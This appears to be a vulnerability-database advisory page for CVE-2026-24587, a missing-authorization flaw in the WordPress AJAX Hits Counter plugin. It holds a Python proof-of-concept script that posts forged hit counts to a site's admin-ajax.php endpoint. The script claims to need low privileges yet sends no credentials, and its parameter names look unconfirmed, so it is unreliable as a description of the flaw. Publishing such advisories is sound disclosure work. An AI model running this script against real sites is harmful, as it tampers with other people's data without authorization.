Security Vulnerability Report
中文
CVE-2026-24587 CVSS 5.4 MEDIUM

CVE-2026-24587

Published: 2026-01-23 15:16:17
Last Modified: 2026-04-28 15:16:17

Description

Missing Authorization vulnerability in kutsy AJAX Hits Counter + Popular Posts Widget ajax-hits-counter allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AJAX Hits Counter + Popular Posts Widget: from n/a through <= 0.10.210305.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

AJAX Hits Counter + Popular Posts Widget <= 0.10.210305

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-24587 PoC - Missing Authorization in AJAX Hits Counter Plugin # Target: WordPress site with AJAX Hits Counter plugin <= 0.10.210305 def exploit_cve_2026_24587(target_url, post_id, increment_value): """ Exploit missing authorization vulnerability in AJAX Hits Counter plugin Allows low-privileged users to manipulate post hit counters Args: target_url: Base URL of WordPress site post_id: Target post ID to modify hit counter increment_value: Value to add to hit counter """ ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Payload to exploit the authorization bypass data = { 'action': 'ahc_hit', # Plugin AJAX action 'post_id': post_id, 'hit_count': increment_value } headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest' } try: print(f"[*] Sending exploit request to {ajax_endpoint}") print(f"[*] Target Post ID: {post_id}, Increment: {increment_value}") response = requests.post(ajax_endpoint, data=data, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Request successful - Status: {response.status_code}") print(f"[+] Response: {response.text[:200]}") return True else: print(f"[-] Request failed - Status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-24587.py <target_url> [post_id] [increment]") print("Example: python cve-2026-24587.py http://example.com 1 9999") sys.exit(1) target = sys.argv[1] post_id = int(sys.argv[2]) if len(sys.argv) > 2 else 1 increment = sys.argv[3] if len(sys.argv) > 3 else '9999' exploit_cve_2026_24587(target, post_id, increment)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24587", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:16.650", "lastModified": "2026-04-28T15:16:17.123", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in kutsy AJAX Hits Counter + Popular Posts Widget ajax-hits-counter allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AJAX Hits Counter + Popular Posts Widget: from n/a through <= 0.10.210305."}, {"lang": "es", "value": "Vulnerabilidad de falta de autorización en kutsy AJAX Hits Counter + Popular Posts Widget ajax-hits-counter permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a AJAX Hits Counter + Popular Posts Widget: desde n/a hasta &lt;= 0.10.210305."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ajax-hits-counter/vulnerability/wordpress-ajax-hits-counter-popular-posts-widget-plugin-0-10-210305-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}